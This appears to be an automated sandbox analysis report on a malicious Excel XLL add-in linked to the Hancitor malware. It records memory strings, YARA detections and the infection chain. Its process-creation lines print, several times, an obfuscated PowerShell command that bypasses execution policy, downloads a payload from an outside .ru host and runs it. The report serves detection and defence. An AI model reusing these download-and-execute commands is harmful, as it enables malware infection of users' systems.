        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://incidents.diagnostics.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://lifecycle.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://login.microsoftonline.com/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://login.windows.local
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://login.windows.net/common/oauth2/authorize
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://management.azure.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://management.azure.com/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://messaging.office.com/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://ncus.contentsync.
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://ncus.pagecontentsync.
        Source: powershell.exe, 00000002.00000002.350802485.0000000005BA1000.00000004.00000001.sdmp, powershell.exe, 00000006.00000002.335236045.0000000005943000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://officeapps.live.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://officeci.azurewebsites.net/api/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://onedrive.live.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://onedrive.live.com/embed?
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://osi.office.net
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://outlook.office.com/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://outlook.office365.com/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://pages.store.office.com/review/query
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://powerlift.acompli.net
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
        Source: 0708_5355150121.xllString found in binary or memory: https://sectigo.com/CPS0
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://settings.outlook.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://shell.suite.office.com:1443
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://skyapi.live.net/Activity/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://staging.cortana.ai
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://store.office.cn/addinstemplate
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://store.office.com/addinstemplate
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://store.office.de/addinstemplate
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://store.officeppe.com/addinstemplate
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://substrate.office.com/search/api/v2/init
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://tasks.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://templatelogging.office.com/client/log
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://web.microsoftstream.com/video/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://webshell.suite.office.com
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://wus2.contentsync.
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://wus2.pagecontentsync.
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
        Source: F2E779D9-2A7F-4724-B0D9-67BDDA1F0003.0.drString found in binary or memory: https://www.odwebp.svc.ms

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 16.3.snd32sys.exe.12f4305.0.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
        Source: 16.3.snd32sys.exe.12f4305.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
        Source: 16.2.snd32sys.exe.610000.0.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
        Powershell drops PE fileShow sources
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\snd32sys.exeJump to dropped file
        Source: C:\Users\Public\snd32sys.exeProcess Stats: CPU usage > 98%
        Source: C:\Windows\SysWOW64\mshta.exeCode function: 1_3_064950B71_3_064950B7
        Source: C:\Windows\SysWOW64\mshta.exeCode function: 1_3_064950B71_3_064950B7
        Source: C:\Windows\SysWOW64\mshta.exeCode function: 1_3_064950B71_3_064950B7
        Source: C:\Windows\SysWOW64\mshta.exeCode function: 1_3_064950B71_3_064950B7
        Source: C:\Windows\SysWOW64\mshta.exeCode function: 1_3_064950B71_3_064950B7
        Source: C:\Windows\SysWOW64\mshta.exeCode function: 1_3_064950B71_3_064950B7
        Source: C:\Windows\SysWOW64\mshta.exeCode function: 1_3_064950B71_3_064950B7
        Source: C:\Windows\SysWOW64\mshta.exeCode function: 1_3_064950B71_3_064950B7
        Source: C:\Windows\SysWOW64\mshta.exeCode function: 1_3_064950B71_3_064950B7
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04B2E6702_2_04B2E670
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0064315416_2_00643154
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0063A1B716_2_0063A1B7
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0063C25016_2_0063C250
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0064920D16_2_0064920D
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0064338616_2_00643386
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062D39F16_2_0062D39F
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062942016_2_00629420
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_006435C716_2_006435C7
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0065F68B16_2_0065F68B
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0063970716_2_00639707
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062D71116_2_0062D711
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0063C7C016_2_0063C7C0
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0065F7AB16_2_0065F7AB
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0064382C16_2_0064382C
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0065B83016_2_0065B830
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062D9BB16_2_0062D9BB
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00643AA016_2_00643AA0
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062CB2016_2_0062CB20
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0063CBF016_2_0063CBF0
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00652C0316_2_00652C03
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00642CE116_2_00642CE1
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062DC8216_2_0062DC82
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00643D0516_2_00643D05
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062DF3D16_2_0062DF3D
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00642F1316_2_00642F13
        Source: C:\Users\Public\snd32sys.exeCode function: String function: 0062B2C4 appears 61 times
        Source: C:\Users\Public\snd32sys.exeCode function: String function: 0062BBA0 appears 50 times
        Source: C:\Users\Public\snd32sys.exeCode function: String function: 0062B2F8 appears 46 times
        Source: 0708_5355150121.xllStatic PE information: invalid certificate
        Source: snd32sys.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: snd32sys.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
        Source: 0708_5355150121.xllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
        Source: 16.3.snd32sys.exe.12f4305.0.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
        Source: 16.3.snd32sys.exe.12f4305.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
        Source: 16.2.snd32sys.exe.610000.0.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
        Source: 00000001.00000003.225595145.0000000006590000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
        Source: 00000001.00000003.224640872.0000000002F76000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
        Source: 00000001.00000002.227307568.0000000002F76000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
        Source: 00000001.00000003.225197640.0000000002F76000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
        Source: 00000002.00000002.348453730.0000000004B30000.00000004.00000040.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
        Source: 00000002.00000003.262530252.0000000007E07000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
        Source: 00000001.00000003.224221003.0000000002F76000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
        Source: 00000001.00000003.225049085.0000000002F76000.00000004.00000001.sdmp, type: MEMORYMatched rule: PowerShell_Case_Anomaly date = 2017-08-11, author = Florian Roth, description = Detects obfuscated PowerShell hacktools, reference = https://twitter.com/danielhbohannon/status/905096106924761088, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
        Source: classification engineClassification label: mal100.troj.expl.evad.winXLL@10/11@4/4
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3412:120:WilError_01
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{0A2181D0-DD23-4259-8109-9971A9896497} - OProcSessId.datJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\Public\snd32sys.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\Public\snd32sys.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: 0708_5355150121.xllVirustotal: Detection: 23%
        Source: 0708_5355150121.xllReversingLabs: Detection: 17%
        Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /dde
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle c:\Users\Public\snd32sys.exe
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\snd32sys.exe 'C:\Users\Public\snd32sys.exe'
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe 'C:\Windows\SysWOW64\mshta.exe' 'C:\Users\Public\res32.hta' {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} Jump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' poWerSHEll.eXE -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle 'c:\Users\Public\snd32sys.exe' ; sTart 'c:\Users\Public\snd32sys.exe'Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -EX bYpASs -NOp -w 1 WGeT 'http://srand04rf.ru/08.jpg ' -OuTfIle c:\Users\Public\snd32sys.exeJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\snd32sys.exe 'C:\Users\Public\snd32sys.exe' Jump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguagesJump to behavior
        Source: Binary string: c:\HighNature\Straightbusy\conditionSurface\Jobhas\industryCountryfeel.pdb source: snd32sys.exe, snd32sys.exe.6.dr

        Data Obfuscation:

        barindex
        Detected unpacking (overwrites its own PE header)Show sources
        Source: C:\Users\Public\snd32sys.exeUnpacked PE file: 16.2.snd32sys.exe.610000.0.unpack
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00613560 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,16_2_00613560
        Source: initial sampleStatic PE information: section where entry point is pointing to: .img
        Source: 0708_5355150121.xllStatic PE information: section name: .img
        Source: 0708_5355150121.xllStatic PE information: section name: .ico
        Source: 0708_5355150121.xllStatic PE information: section name: .fyjrtr
        Source: 0708_5355150121.xllStatic PE information: section name: .rytkrer
        Source: 0708_5355150121.xllStatic PE information: section name: .reyery
        Source: 0708_5355150121.xllStatic PE information: section name: .txt
        Source: 0708_5355150121.xllStatic PE information: section name: .res
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_04B212A1 push es; ret 2_2_04B212B0
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062B28D push ecx; ret 16_2_0062B2A0
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062034A push 8BFFFFFFh; ret 16_2_0062034F
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_006208AD push 8BFFFFFFh; ret 16_2_006208B2
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_0062BBE6 push ecx; ret 16_2_0062BBF9
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\snd32sys.exeJump to dropped file
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\snd32sys.exeJump to dropped file

        Boot Survival:

        barindex
        Drops PE files to the user root directoryShow sources
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\snd32sys.exeJump to dropped file
        Source: C:\Users\Public\snd32sys.exeCode function: 16_2_00629420 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,16_2_00629420
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
